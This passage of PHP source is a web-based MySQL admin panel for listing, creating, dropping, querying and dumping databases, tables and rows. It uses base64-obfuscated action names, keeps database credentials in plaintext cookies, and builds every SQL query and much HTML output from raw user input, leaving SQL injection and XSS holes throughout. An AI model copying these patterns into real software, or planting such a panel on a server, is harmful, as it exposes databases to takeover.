	echo "</table><p>\n";
	echo "<input type=submit value='Enter'>\n";
	echo "<input type=reset value='Clear'><br>\n";
	echo "</form>\n";
	echo "</center></td></tr></table>\n";
	echo "</center></td></tr></table>\n";
	echo "<p><hr width=300>\n";
	echo "</center></td></tr></table>\n";
}

function logon_submit() {
	global $username, $password, $hostname ,$PHP_SELF;
	if($hostname =='')
		$hostname = 'localhost';
	setcookie( "mysql_web_admin_username", $username );
	setcookie( "mysql_web_admin_password", $password );
	setcookie( "mysql_web_admin_hostname", $hostname );
	echo "<META HTTP-EQUIV=Refresh CONTENT='0; URL=$PHP_SELF?action=bGlzdERCcw=='>";

}

function echoQueryResult() {
	global $queryStr, $errMsg;

	if( $errMsg == "" ) $errMsg = "Success";
	if( $queryStr != "" ) {
		echo "<table cellpadding=5>\n";
		echo "<tr><td>Query</td><td>$queryStr</td></tr>\n";
		echo "<tr><td>Result</td><td>$errMsg</td></tr>\n";
		echo "</table><p>\n";
	}
}

function listDatabases() {
	global $mysqlHandle, $PHP_SELF;

	echo "<h1>Databases List</h1>\n";

	echo "<form action='$PHP_SELF'>\n";
	echo "<input type=hidden name=action value=createDB>\n";
	echo "<input type=text name=dbname>\n";
	echo "<input type=submit value='Create Database'>\n";
	echo "</form>\n";
	echo "<hr>\n";

	echo "<table cellspacing=1 cellpadding=5>\n";

	$pDB = mysql_list_dbs( $mysqlHandle );
	$num = mysql_num_rows( $pDB );
	for( $i = 0; $i < $num; $i++ ) {
		$dbname = mysql_dbname( $pDB, $i );
		echo "<tr>\n";
		echo "<td>$dbname</td>\n";
		echo "<td><a href='$PHP_SELF?action=listTables&dbname=$dbname'>Tables</a></td>\n";
		echo "<td><a href='$PHP_SELF?action=dropDB&dbname=$dbname' onClick=\"return confirm('Drop Database \'$dbname\'?')\">Drop</a></td>\n";
		echo "<td><a href='$PHP_SELF?action=dumpDB&dbname=$dbname' onClick=\"return confirm('Dump Database \'$dbname\'?')\">Dump</a></td>\n";
		echo "</tr>\n";
	}
	echo "</table>\n";
}

function createDatabase() {
	global $mysqlHandle, $dbname, $PHP_SELF;

	mysql_create_db( $dbname, $mysqlHandle );
	listDatabases();
}

function dropDatabase() {
	global $mysqlHandle, $dbname, $PHP_SELF;

	mysql_drop_db( $dbname, $mysqlHandle );
	listDatabases();
}

function listTables() {
	global $mysqlHandle, $dbname, $PHP_SELF;


	echo "<h1>Tables List</h1>\n";
	echo "<p class=location>$dbname</p>\n";
	echoQueryResult();
	echo "<form action='$PHP_SELF'>\n";
	echo "<input type=hidden name=action value=createTable>\n";
	echo "<input type=hidden name=dbname value=$dbname>\n";
	echo "<input type=text name=tablename>\n";
	echo "<input type=submit value='Create Table'>\n";
	echo "</form>\n";
	echo "<form action='$PHP_SELF'>\n";
	echo "<input type=hidden name=action value=query>\n";
	echo "<input type=hidden name=dbname value=$dbname>\n";
	echo "<input type=text size=120 name=queryStr>\n";
	echo "<input type=submit value='Query'>\n";
	echo "</form>\n";
	echo "<hr>\n";

	$pTable = mysql_list_tables( $dbname );

	if( $pTable == 0 ) {
		$msg  = mysql_error();
		echo "<h3>Error : $msg</h3><p>\n";
		return;
	}
	$num = mysql_num_rows( $pTable );

	echo "<table cellspacing=1 cellpadding=5>\n";

	for( $i = 0; $i < $num; $i++ ) {
		$tablename = mysql_tablename( $pTable, $i );

		echo "<tr>\n";
		echo "<td>\n";
		echo "$tablename\n";
		echo "</td>\n";
		echo "<td>\n";
		echo "<a href='$PHP_SELF?action=viewSchema&dbname=$dbname&tablename=$tablename'>Schema</a>\n";
		echo "</td>\n";
		echo "<td>\n";
		echo "<a href='$PHP_SELF?action=dmlld0RhdGE=&dbname=$dbname&tablename=$tablename'>Data</a>\n";
		echo "</td>\n";
		echo "<td>\n";
		echo "<a href='$PHP_SELF?action=dropTable&dbname=$dbname&tablename=$tablename' onClick=\"return confirm('Drop Table \'$tablename\'?')\">Drop</a>\n";
		echo "</td>\n";
		echo "<td>\n";
		echo "<a href='$PHP_SELF?action=dumpTable&dbname=$dbname&tablename=$tablename' onClick=\"return confirm('Dump Table \'$tablename\'?')\">Dump</a>\n";
		echo "</td>\n";
		echo "</tr>\n";
	}

	echo "</table>";
}

function createTable() {
	global $mysqlHandle, $dbname, $tablename, $PHP_SELF, $queryStr, $errMsg;

	$queryStr = "CREATE TABLE $tablename ( no INT )";
	mysql_select_db( $dbname, $mysqlHandle );
	mysql_query( $queryStr, $mysqlHandle );
	$errMsg = mysql_error();

	listTables();
}

function dropTable() {
	global $mysqlHandle, $dbname, $tablename, $PHP_SELF, $queryStr, $errMsg;

	$queryStr = "DROP TABLE $tablename";
	mysql_select_db( $dbname, $mysqlHandle );
	mysql_query( $queryStr, $mysqlHandle );
	$errMsg = mysql_error();

	listTables();
}

function viewSchema() {
	global $mysqlHandle, $dbname, $tablename, $PHP_SELF, $queryStr, $errMsg;

	echo "<h1>Table Schema</h1>\n";
	echo "<p class=location>$dbname &gt; $tablename</p>\n";

	echoQueryResult();

	echo "<a href='$PHP_SELF?action=addField&dbname=$dbname&tablename=$tablename'>Add Field</a> | \n";
	echo "<a href='$PHP_SELF?action=dmlld0RhdGE=&dbname=$dbname&tablename=$tablename'>View Data</a>\n";
	echo "<hr>\n";

	$pResult = mysql_db_query( $dbname, "SHOW fields FROM $tablename" );
	$num = mysql_num_rows( $pResult );

	echo "<table cellspacing=1 cellpadding=5>\n";
	echo "<tr>\n";
	echo "<th>Field</th>\n";
	echo "<th>Type</th>\n";
	echo "<th>Null</th>\n";
	echo "<th>Key</th>\n";
	echo "<th>Default</th>\n";
	echo "<th>Extra</th>\n";
	echo "<th colspan=2>Action</th>\n";
	echo "</tr>\n";


	for( $i = 0; $i < $num; $i++ ) {
		$field = mysql_fetch_array( $pResult );
		echo "<tr>\n";
		echo "<td>".$field["Field"]."</td>\n";
		echo "<td>".$field["Type"]."</td>\n";
		echo "<td>".$field["Null"]."</td>\n";
		echo "<td>".$field["Key"]."</td>\n";
		echo "<td>".$field["Default"]."</td>\n";
		echo "<td>".$field["Extra"]."</td>\n";
		$fieldname = $field["Field"];
		echo "<td><a href='$PHP_SELF?action=editField&dbname=$dbname&tablename=$tablename&fieldname=$fieldname'>Edit</a></td>\n";
		echo "<td><a href='$PHP_SELF?action=dropField&dbname=$dbname&tablename=$tablename&fieldname=$fieldname' onClick=\"return confirm('Drop Field \'$fieldname\'?')\">Drop</a></td>\n";
		echo "</tr>\n";
	}
	echo "</table>\n";

}

function manageField( $cmd ) {
	global $mysqlHandle, $dbname, $tablename, $fieldname, $PHP_SELF;

	if( $cmd == "add" )
		echo "<h1>Add Field</h1>\n";
	else if( $cmd == "edit" ) {
		echo "<h1>Edit Field</h1>\n";
		$pResult = mysql_db_query( $dbname, "SHOW fields FROM $tablename" );
		$num = mysql_num_rows( $pResult );
		for( $i = 0; $i < $num; $i++ ) {
			$field = mysql_fetch_array( $pResult );
			if( $field["Field"] == $fieldname ) {
				$fieldtype = $field["Type"];
				$fieldkey = $field["Key"];
				$fieldextra = $field["Extra"];
				$fieldnull = $field["Null"];
				$fielddefault = $field["Default"];
				break;
			}
		}
		$type = strtok( $fieldtype, " (,)\n" );
		if( strpos( $fieldtype, "(" ) ) {
			if( $type == "enum" | $type == "set" ) {
				$valuelist = strtok( " ()\n" );
			} else {
				$M = strtok( " (,)\n" );
				if( strpos( $fieldtype, "," ) )
					$D = strtok( " (,)\n" );
			}
		}
	}

	echo "<p class=location>$dbname &gt; $tablename</p>\n";
	echo "<form action=$PHP_SELF>\n";

	if( $cmd == "add" )
		echo "<input type=hidden name=action value=addField_submit>\n";
	else if( $cmd == "edit" ) {
		echo "<input type=hidden name=action value=editField_submit>\n";
		echo "<input type=hidden name=old_name value=$fieldname>\n";
	}
	echo "<input type=hidden name=dbname value=$dbname>\n";
	echo "<input type=hidden name=tablename value=$tablename>\n";

	echo "<h3>Name</h3>\n";
	echo "<input type=text name=name value=$fieldname><p>\n";
	echo '

<h3>Type</h3>

<font size=2>
* `M\' indicates the maximum display size.<br>
* `D\' applies to floating-point types and indicates the number of digits following the decimal point.<br>
</font>

<table>
<tr>
<th>Type</th><th>&nbspM&nbsp</th><th>&nbspD&nbsp</th><th>unsigned</th><th>zerofill</th><th>binary</th>
</tr>
<tr>
<td><input type=radio name=type value="TINYINT" '; if( $type == "tinyint" ) echo "checked";echo '>TINYINT (-128 ~ 127)</td>
<td align=center>O</td>
<td>&nbsp</td>
<td align=center>O</td>
<td align=center>O</td>
<td>&nbsp</td>
</tr>
<tr>
<td><input type=radio name=type value="SMALLINT" '; if( $type == "smallint" ) echo "checked";echo '>SMALLINT (-32768 ~ 32767)</td>
<td align=center>O</td>
<td>&nbsp</td>
<td align=center>O</td>
<td align=center>O</td>
<td>&nbsp</td>
</tr>
<tr>
<td><input type=radio name=type value="MEDIUMINT" '; if( $type == "mediumint" ) echo "checked";echo '>MEDIUMINT (-8388608 ~ 8388607)</td>

<td align=center>O</td>
<td>&nbsp</td>
<td align=center>O</td>
<td align=center>O</td>
<td>&nbsp</td>
</tr>
<tr>
<td><input type=radio name=type value="INT" '; if( $type == "int" ) echo "checked";echo '>INT (-2147483648 ~ 2147483647)</td>
<td align=center>O</td>
<td>&nbsp</td>
<td align=center>O</td>
<td align=center>O</td>
<td>&nbsp</td>
</tr>
<tr>
<td><input type=radio name=type value="BIGINT" '; if( $type == "bigint" ) echo "checked";echo '>BIGINT (-9223372036854775808 ~ 9223372036854775807)</td>
<td align=center>O</td>
<td>&nbsp</td>
<td align=center>O</td>
<td align=center>O</td>
<td>&nbsp</td>
</tr>
<tr>
<td><input type=radio name=type value="FLOAT" '; if( $type == "float" ) echo "checked";echo '>FLOAT</td>
<td align=center>O</td>
<td align=center>O</td>
<td>&nbsp</td>
<td align=center>O</td>
<td>&nbsp</td>
</tr>
<tr>
<td><input type=radio name=type value="DOUBLE" '; if( $type == "double" ) echo "checked";echo '>DOUBLE</td>
<td align=center>O</td>
<td align=center>O</td>
<td>&nbsp</td>
<td align=center>O</td>
<td>&nbsp</td>
</tr>
<tr>
<td><input type=radio name=type value="DECIMAL" '; if( $type == "decimal" ) echo "checked";echo '>DECIMAL(NUMERIC)</td>
<td align=center>O</td>
<td align=center>O</td>
<td>&nbsp</td>
<td align=center>O</td>
<td>&nbsp</td>
</tr>
<tr>
<td><input type=radio name=type value="DATE" '; if( $type == "date" ) echo "checked";echo '>DATE (1000-01-01 ~ 9999-12-31, YYYY-MM-DD)</td>
<td>&nbsp</td>
<td>&nbsp</td>
<td>&nbsp</td>
<td>&nbsp</td>
<td>&nbsp</td>
</tr>
<tr>
<td><input type=radio name=type value="DATETIME" '; if( $type == "datetime" ) echo "checked";echo '>DATETIME (1000-01-01 00:00:00 ~ 9999-12-31 23:59:59, YYYY-MM-DD HH:MM:SS)</td>
<td>&nbsp</td>
<td>&nbsp</td>
<td>&nbsp</td>
<td>&nbsp</td>
<td>&nbsp</td>
</tr>
<tr>
<td><input type=radio name=type value="TIMESTAMP" '; if( $type == "timestamp" ) echo "checked";echo '>TIMESTAMP (1970-01-01 00:00:00 ~ 2106..., YYYYMMDD[HH[MM[SS]]])</td>
<td align=center>O</td>
<td>&nbsp</td>
<td>&nbsp</td>
<td>&nbsp</td>
<td>&nbsp</td>
</tr>
<tr>
<td><input type=radio name=type value="TIME" '; if( $type == "time" ) echo "checked";echo '>TIME (-838:59:59 ~ 838:59:59, HH:MM:SS)</td>
<td>&nbsp</td>
<td>&nbsp</td>
<td>&nbsp</td>
<td>&nbsp</td>
<td>&nbsp</td>
</tr>
<tr>
<td><input type=radio name=type value="YEAR" '; if( $type == "year" ) echo "checked";echo '>YEAR (1901 ~ 2155, 0000, YYYY)</td>
<td>&nbsp</td>
<td>&nbsp</td>
<td>&nbsp</td>
<td>&nbsp</td>
<td>&nbsp</td>
</tr>
<tr>
<td><input type=radio name=type value="CHAR" '; if( $type == "char" ) echo "checked";echo '>CHAR</td>
<td align=center>O</td>
<td>&nbsp</td>
<td>&nbsp</td>
<td>&nbsp</td>
<td align=center>O</td>
</tr>
<tr>
<td><input type=radio name=type value="VARCHAR" '; if( $type == "varchar" ) echo "checked";echo '>VARCHAR</td>
<td align=center>O</td>
<td>&nbsp</td>
<td>&nbsp</td>
<td>&nbsp</td>
<td align=center>O</td>
</tr>
<tr>
<td><input type=radio name=type value="TINYTEXT" '; if( $type == "tinytext" ) echo "checked";echo '>TINYTEXT (0 ~ 255)</td>
<td>&nbsp</td>
<td>&nbsp</td>
<td>&nbsp</td>
<td>&nbsp</td>
<td>&nbsp</td>
</tr>
<tr>
<td><input type=radio name=type value="TEXT" '; if( $type == "text" ) echo "checked";echo '>TEXT (0 ~ 65535)</td>
<td>&nbsp</td>
<td>&nbsp</td>
<td>&nbsp</td>
<td>&nbsp</td>
<td>&nbsp</td>
</tr>
<tr>
<td><input type=radio name=type value="MEDIUMTEXT" '; if( $type == "mediumtext" ) echo "checked";echo '>MEDIUMTEXT (0 ~ 16777215)</td>
<td>&nbsp</td>
<td>&nbsp</td>
<td>&nbsp</td>
<td>&nbsp</td>
<td>&nbsp</td>
</tr>
<tr>
<td><input type=radio name=type value="LONGTEXT" '; if( $type == "longtext" ) echo "checked";echo '>LONGTEXT (0 ~ 4294967295)</td>
<td>&nbsp</td>
<td>&nbsp</td>
<td>&nbsp</td>
<td>&nbsp</td>
<td>&nbsp</td>
</tr>
<tr>
<td><input type=radio name=type value="TINYBLOB" '; if( $type == "tinyblob" ) echo "checked";echo '>TINYBLOB (0 ~ 255)</td>
<td>&nbsp</td>
<td>&nbsp</td>
<td>&nbsp</td>
<td>&nbsp</td>
<td>&nbsp</td>
</tr>
<tr>
<td><input type=radio name=type value="BLOB" '; if( $type == "blob" ) echo "checked";echo '>BLOB (0 ~ 65535)</td>
<td>&nbsp</td>
<td>&nbsp</td>
<td>&nbsp</td>
<td>&nbsp</td>
<td>&nbsp</td>
</tr>
<tr>
<td><input type=radio name=type value="MEDIUMBLOB" '; if( $type == "mediumblob" ) echo "checked";echo '>MEDIUMBLOB (0 ~ 16777215)</td>
<td>&nbsp</td>
<td>&nbsp</td>
<td>&nbsp</td>
<td>&nbsp</td>
<td>&nbsp</td>
</tr>
<tr>
<td><input type=radio name=type value="LONGBLOB" '; if( $type == "longblob" ) echo "checked";echo '>LONGBLOB (0 ~ 4294967295)</td>
<td>&nbsp</td>
<td>&nbsp</td>
<td>&nbsp</td>
<td>&nbsp</td>
<td>&nbsp</td>
</tr>
<tr>
<td><input type=radio name=type value="ENUM" '; if( $type == "enum" ) echo "checked";echo '>ENUM</td>
<td colspan=5><center>value list</center></td>
</tr>
<tr>
<td><input type=radio name=type value="SET" '; if( $type == "set" ) echo "checked";echo '>SET</td>
<td colspan=5><center>value list</center></td>
</tr>

</table>
<table>
<tr><th>M</th><th>D</th><th>unsigned</th><th>zerofill</th><th>binary</th><th>value list (ex: \'apple\', \'orange\', \'banana\') </th></tr>
<tr>
<td align=center><input type=text size=4 name=M '; if( $M != "" ) echo "value=$M";echo '></td>
<td align=center><input type=text size=4 name=D '; if( $D != "" ) echo "value=$D";echo '></td>
<td align=center><input type=checkbox name=unsigned value="UNSIGNED" '; if( strpos( $fieldtype, "unsigned" ) ) echo "checked";echo '></td>
<td align=center><input type=checkbox name=zerofill value="ZEROFILL" '; if( strpos( $fieldtype, "zerofill" ) ) echo "checked";echo '></td>
<td align=center><input type=checkbox name=binary value="BINARY" '; if( strpos( $fieldtype, "binary" )  ) echo "checked";echo '></td>
<td align=center><input type=text size=60 name=valuelist '; if( $valuelist != "" ) echo "value=\"$valuelist\"";echo '></td>
</tr>
</table>


<h3>Flags</h3>
<table>
<tr><th>not null</th><th>default value</th><th>auto increment</th><th>primary key</th></tr>
<tr>
<td align=center><input type=checkbox name=not_null value="NOT NULL" '; if( $fieldnull != "YES" ) echo "checked";echo '></td>
<td align=center><input type=text name=default_value '; if( $fielddefault != "" ) echo "value=$fielddefault";echo '></td>
<td align=center><input type=checkbox name=auto_increment value="AUTO_INCREMENT" '; if( $fieldextra == "auto_increment" ) echo "checked";echo '></td>
<td align=center><input type=checkbox name=primary_key value="PRIMARY KEY" '; if( $fieldkey == "PRI" ) echo "checked";echo '></td>
</tr>
</table>

<p>';

	if( $cmd == "add" )
		echo "<input type=submit value='Add Field'>\n";
	else if( $cmd == "edit" )
		echo "<input type=submit value='Edit Field'>\n";
	echo "<input type=button value=Cancel onClick='history.back()'>\n";
	echo "</form>\n";
}

function manageField_submit( $cmd ) {
	global $mysqlHandle, $dbname, $tablename, $old_name, $name, $type, $PHP_SELF, $queryStr, $errMsg,
		$M, $D, $unsigned, $zerofill, $binary, $not_null, $default_value, $auto_increment, $primary_key, $valuelist;

	if( $cmd == "add" )
		$queryStr = "ALTER TABLE $tablename ADD $name ";
	else if( $cmd == "edit" )
		$queryStr = "ALTER TABLE $tablename CHANGE $old_name $name ";

	if( $M != "" )
		if( $D != "" )
			$queryStr .= "$type($M,$D) ";
		else
			$queryStr .= "$type($M) ";
	else if( $valuelist != "" ) {
		$valuelist = stripslashes( $valuelist );
		$queryStr .= "$type($valuelist) ";
	} else
		$queryStr .= "$type ";

	$queryStr .= "$unsigned $zerofill $binary ";

	if( $default_value != "" )
		$queryStr .= "DEFAULT '$default_value' ";

	$queryStr .= "$not_null $auto_increment";

	mysql_select_db( $dbname, $mysqlHandle );
	mysql_query( $queryStr, $mysqlHandle );
	$errMsg = mysql_error();

	// key change
	$keyChange = false;
	$result = mysql_query( "SHOW KEYS FROM $tablename" );
	$primary = "";
	while( $row = mysql_fetch_array($result) )
		if( $row["Key_name"] == "PRIMARY" ) {
			if( $row[Column_name] == $name )
				$keyChange = true;
			else
				$primary .= ", $row[Column_name]";
		}
	if( $primary_key == "PRIMARY KEY" ) {
		$primary .= ", $name";
		$keyChange = !$keyChange;
	}
	$primary = substr( $primary, 2 );
	if( $keyChange == true ) {
		$q = "ALTER TABLE $tablename DROP PRIMARY KEY";
		mysql_query( $q );
		$queryStr .= "<br>\n" . $q;
		$errMsg .= "<br>\n" . mysql_error();
		$q = "ALTER TABLE $tablename ADD PRIMARY KEY( $primary )";
		mysql_query( $q );
		$queryStr .= "<br>\n" . $q;
		$errMsg .= "<br>\n" . mysql_error();
	}

	viewSchema();
}

function dropField() {
	global $mysqlHandle, $dbname, $tablename, $fieldname, $PHP_SELF, $queryStr, $errMsg;

	$queryStr = "ALTER TABLE $tablename DROP COLUMN $fieldname";
	mysql_select_db( $dbname, $mysqlHandle );
	mysql_query( $queryStr , $mysqlHandle );
	$errMsg = mysql_error();

	viewSchema();
}

function viewData( $queryStr ) {
	global $action, $mysqlHandle, $dbname, $tablename, $PHP_SELF, $errMsg, $page, $rowperpage, $orderby;

	echo "<h1>Data in Table</h1>\n";
	if( $tablename != "" )
		echo "<p class=location>$dbname &gt; $tablename</p>\n";
	else
		echo "<p class=location>$dbname</p>\n";

	$queryStr = stripslashes( $queryStr );
	if( $queryStr == "" ) {
		$queryStr = "SELECT * FROM $tablename";
		if( $orderby != "" )
			$queryStr .= " ORDER BY $orderby";
		echo "<a href='$PHP_SELF?action=addData&dbname=$dbname&tablename=$tablename'>Add Data</a> | \n";
		echo "<a href='$PHP_SELF?action=viewSchema&dbname=$dbname&tablename=$tablename'>Schema</a>\n";
	}

	$pResult = mysql_db_query( $dbname, $queryStr );
	$fieldt = mysql_fetch_field($pResult);
	$tablename = $fieldt->table;
	$errMsg = mysql_error();

	$GLOBALS[queryStr] = $queryStr;

	if( $pResult == false ) {
		echoQueryResult();
		return;
	}
	if( $pResult == 1 ) {
		$errMsg = "Success";
		echoQueryResult();
		return;
	}

	echo "<hr>\n";

	$row = mysql_num_rows( $pResult );
	$col = mysql_num_fields( $pResult );

	if( $row == 0 ) {
		echo "No Data Exist!";
		return;
	}

	if( $rowperpage == "" ) $rowperpage = 30;
	if( $page == "" ) $page = 0;
	else $page--;
	mysql_data_seek( $pResult, $page * $rowperpage );

	echo "<table cellspacing=1 cellpadding=2>\n";
	echo "<tr>\n";
	for( $i = 0; $i < $col; $i++ ) {
		$field = mysql_fetch_field( $pResult, $i );
		echo "<th>";
		if($action == "dmlld0RhdGE=")
			echo "<a href='$PHP_SELF?action=dmlld0RhdGE=&dbname=$dbname&tablename=$tablename&orderby=".$field->name."'>".$field->name."</a>\n";
		else
			echo $field->name."\n";
		echo "</th>\n";
	}
	echo "<th colspan=2>Action</th>\n";
	echo "</tr>\n";

	for( $i = 0; $i < $rowperpage; $i++ ) {
		$rowArray = mysql_fetch_row( $pResult );
		if( $rowArray == false ) break;
		echo "<tr>\n";
		$key = "";
		for( $j = 0; $j < $col; $j++ ) {
			$data = $rowArray[$j];

			$field = mysql_fetch_field( $pResult, $j );
			if( $field->primary_key == 1 )
				$key .= "&" . $field->name . "=" . $data;

			if( strlen( $data ) > 30 )
				$data = substr( $data, 0, 30 ) . "...";
			$data = htmlspecialchars( $data );
			echo "<td>\n";
			echo "$data\n";
			echo "</td>\n";
		}

		if( $key == "" )
			echo "<td colspan=2>no Key</td>\n";
		else {
			echo "<td><a href='$PHP_SELF?action=editData$key&dbname=$dbname&tablename=$tablename'>Edit</a></td>\n";
			echo "<td><a href='$PHP_SELF?action=deleteData$key&dbname=$dbname&tablename=$tablename' onClick=\"return confirm('Delete Row?')\">Delete</a></td>\n";
		}
		echo "</tr>\n";
	}
	echo "</table>\n";

	echo "<font size=2>\n";
	if($action == "dmlld0RhdGE=")
		echo "<form action='$PHP_SELF?action=dmlld0RhdGE=&dbname=$dbname&tablename=$tablename' method=post>\n";
	else
		echo "<form action='$PHP_SELF?action=query&dbname=$dbname&tablename=$tablename&queryStr=$queryStr' method=post>\n";

	echo ($page+1)."/".(int)($row/$rowperpage+1)." page";
	echo "</font>\n";
	echo " | ";
	if( $page > 0 ) {
		if($action == "dmlld0RhdGE=")
			echo "<a href='$PHP_SELF?action=dmlld0RhdGE=&dbname=$dbname&tablename=$tablename&page=".($page);
		else
			echo "<a href='$PHP_SELF?action=query&dbname=$dbname&tablename=$tablename&queryStr=$queryStr&page=".($page);
		if( $orderby != "" && $action == "dmlld0RhdGE=")
			echo "&orderby=$orderby";
		echo "'>Prev</a>\n";
	} else
		echo "Prev";
	echo " | ";
	if( $page < ($row/$rowperpage)-1 ) {
		if($action == "dmlld0RhdGE=")
			echo "<a href='$PHP_SELF?action=dmlld0RhdGE=&dbname=$dbname&tablename=$tablename&page=".($page+2);
		else
			echo "<a href='$PHP_SELF?action=query&dbname=$dbname&tablename=$tablename&queryStr=$queryStr&page=".($page+2);
		if( $orderby != "" && $action == "dmlld0RhdGE=")
			echo "&orderby=$orderby";
		echo "'>Next</a>\n";
	} else
		echo "Next";
	echo " | ";
	if( $row > $rowperpage ) {
		echo "<input type=text size=4 name=page>\n";
		echo "<input type=submit value='Go'>\n";
	}
	echo "</form>\n";
	echo "</font>\n";
}

function manageData( $cmd ) {
	global $mysqlHandle, $dbname, $tablename, $PHP_SELF;

	if( $cmd == "add" )
		echo "<h1>Add Data</h1>\n";
	else if( $cmd == "edit" ) {
		echo "<h1>Edit Data</h1>\n";
		$pResult = mysql_list_fields( $dbname, $tablename );
		$num = mysql_num_fields( $pResult );

		$key = "";
		for( $i = 0; $i < $num; $i++ ) {
			$field = mysql_fetch_field( $pResult, $i );
			if( $field->primary_key == 1 )
				if( $field->numeric == 1 )
					$key .= $field->name . "=" . $GLOBALS[$field->name] . " AND ";
				else
					$key .= $field->name . "='" . $GLOBALS[$field->name] . "' AND ";
		}
		$key = substr( $key, 0, strlen($key)-4 );

		mysql_select_db( $dbname, $mysqlHandle );
		$pResult = mysql_query( $queryStr =  "SELECT * FROM $tablename WHERE $key", $mysqlHandle );
		$data = mysql_fetch_array( $pResult );
	}

	echo "<p class=location>$dbname &gt; $tablename</p>\n";

	echo "<form action='$PHP_SELF' method=post>\n";
	if( $cmd == "add" )
		echo "<input type=hidden name=action value=addData_submit>\n";
	else if( $cmd == "edit" )
		echo "<input type=hidden name=action value=editData_submit>\n";
	echo "<input type=hidden name=dbname value=$dbname>\n";
	echo "<input type=hidden name=tablename value=$tablename>\n";
	echo "<table cellspacing=1 cellpadding=2>\n";
	echo "<tr>\n";
	echo "<th>Name</th>\n";
	echo "<th>Type</th>\n";
	echo "<th>Function</th>\n";
	echo "<th>Data</th>\n";
	echo "</tr>\n";

	$pResult = mysql_db_query( $dbname, "SHOW fields FROM $tablename" );
	$num = mysql_num_rows( $pResult );

	$pResultLen = mysql_list_fields( $dbname, $tablename );

	for( $i = 0; $i < $num; $i++ ) {
		$field = mysql_fetch_array( $pResult );
		$fieldname = $field["Field"];
		$fieldtype = $field["Type"];
		$len = mysql_field_len( $pResultLen, $i );

		echo "<tr>";
		echo "<td>$fieldname</td>";
		echo "<td>".$field["Type"]."</td>";
		echo "<td>\n";
		echo "<select name=${fieldname}_function>\n";
		echo "<option>\n";
		echo "<option>ASCII\n";
		echo "<option>CHAR\n";
		echo "<option>SOUNDEX\n";
		echo "<option>CURDATE\n";
		echo "<option>CURTIME\n";
		echo "<option>FROM_DAYS\n";
		echo "<option>FROM_UNIXTIME\n";
		echo "<option>NOW\n";
		echo "<option>PASSWORD\n";
		echo "<option>PERIOD_ADD\n";
		echo "<option>PERIOD_DIFF\n";
		echo "<option>TO_DAYS\n";
		echo "<option>USER\n";
		echo "<option>WEEKDAY\n";
		echo "<option>RAND\n";
		echo "</select>\n";
		echo "</td>\n";
		$value = htmlspecialchars($data[$i]);
		if( $cmd == "add" ) {
			$type = strtok( $fieldtype, " (,)\n" );
			if( $type == "enum" || $type == "set" ) {
				echo "<td>\n";
				if( $type == "enum" )
					echo "<select name=$fieldname>\n";
				else if( $type == "set" )
					echo "<select name=$fieldname size=4 multiple>\n";
				while( $str = strtok( "'" ) ) {
					echo "<option>$str\n";
					strtok( "'" );
				}
				echo "</select>\n";
				echo "</td>\n";
			} else {
				if( $len < 40 )
					echo "<td><input type=text size=40 maxlength=$len name=$fieldname></td>\n";
				else
					echo "<td><textarea cols=40 rows=3 maxlength=$len name=$fieldname></textarea>\n";
			}
		} else if( $cmd == "edit" ) {
			$type = strtok( $fieldtype, " (,)\n" );
			if( $type == "enum" || $type == "set" ) {
				echo "<td>\n";
				if( $type == "enum" )
					echo "<select name=$fieldname>\n";
				else if( $type == "set" )
					echo "<select name=$fieldname size=4 multiple>\n";
				while( $str = strtok( "'" ) ) {
					if( $value == $str )
						echo "<option selected>$str\n";
					else
						echo "<option>$str\n";
					strtok( "'" );
				}
				echo "</select>\n";
				echo "</td>\n";
			} else {
				if( $len < 40 )
					echo "<td><input type=text size=40 maxlength=$len name=$fieldname value=\"$value\"></td>\n";
				else
					echo "<td><textarea cols=40 rows=3 maxlength=$len name=$fieldname>$value</textarea>\n";
			}
		}
		echo "</tr>";
	}
	echo "</table><p>\n";
	if( $cmd == "add" )
		echo "<input type=submit value='Add Data'>\n";
	else if( $cmd == "edit" )
		echo "<input type=submit value='Edit Data'>\n";
	echo "<input type=button value='Cancel' onClick='history.back()'>\n";
	echo "</form>\n";
}

function manageData_submit( $cmd ) {
	global $mysqlHandle, $dbname, $tablename, $fieldname, $PHP_SELF, $queryStr, $errMsg;

	$pResult = mysql_list_fields( $dbname, $tablename );
	$num = mysql_num_fields( $pResult );

	mysql_select_db( $dbname, $mysqlHandle );
	if( $cmd == "add" )
		$queryStr = "INSERT INTO $tablename VALUES (";
	else if( $cmd == "edit" )
		$queryStr = "REPLACE INTO $tablename VALUES (";
	for( $i = 0; $i < $num-1; $i++ ) {
		$field = mysql_fetch_field( $pResult );
		$func = $GLOBALS[$field->name."_function"];
		if( $func != "" )
			$queryStr .= " $func(";
		if( $field->numeric == 1 ) {
			$queryStr .= $GLOBALS[$field->name];
			if( $func != "" )
				$queryStr .= "),";
			else
				$queryStr .= ",";
		} else {
			$queryStr .= "'" . $GLOBALS[$field->name];
			if( $func != "" )
				$queryStr .= "'),";
			else
				$queryStr .= "',";
		}
	}
	$field = mysql_fetch_field( $pResult );
	if( $field->numeric == 1 )
		$queryStr .= $GLOBALS[$field->name] . ")";
	else
		$queryStr .= "'" . $GLOBALS[$field->name] . "')";

	mysql_query( $queryStr , $mysqlHandle );
	$errMsg = mysql_error();

	viewData( "" );
}

function deleteData() {
	global $mysqlHandle, $dbname, $tablename, $fieldname, $PHP_SELF, $queryStr, $errMsg;

	$pResult = mysql_list_fields( $dbname, $tablename );
	$num = mysql_num_fields( $pResult );

	$key = "";
	for( $i = 0; $i < $num; $i++ ) {
		$field = mysql_fetch_field( $pResult, $i );
		if( $field->primary_key == 1 )
			if( $field->numeric == 1 )
				$key .= $field->name . "=" . $GLOBALS[$field->name] . " AND ";
			else
				$key .= $field->name . "='" . $GLOBALS[$field->name] . "' AND ";
	}
	$key = substr( $key, 0, strlen($key)-4 );

	mysql_select_db( $dbname, $mysqlHandle );
	$queryStr =  "DELETE FROM $tablename WHERE $key";
	mysql_query( $queryStr, $mysqlHandle );
	$errMsg = mysql_error();

	viewData( "" );
}

function fetch_table_dump_sql($table)
{
	global $mysqlHandle,$dbname;

	mysql_select_db( $dbname, $mysqlHandle );
	$query_id = mysql_query("SHOW CREATE TABLE $table",$mysqlHandle);
	$tabledump = mysql_fetch_array($query_id, MYSQL_ASSOC);
	$tabledump = "DROP TABLE IF EXISTS $table;\n" . $tabledump['Create Table'] . ";\n\n";

	echo $tabledump;

	// get data
	$rows = mysql_query("SELECT * FROM $table",$mysqlHandle);
	$numfields=mysql_num_fields($rows);
	while ($row = mysql_fetch_array($rows, MYSQL_NUM))
	{
		$tabledump = "INSERT INTO $table VALUES(";

		$fieldcounter = -1;
		$firstfield = 1;
		// get each field's data
		while (++$fieldcounter < $numfields)
		{
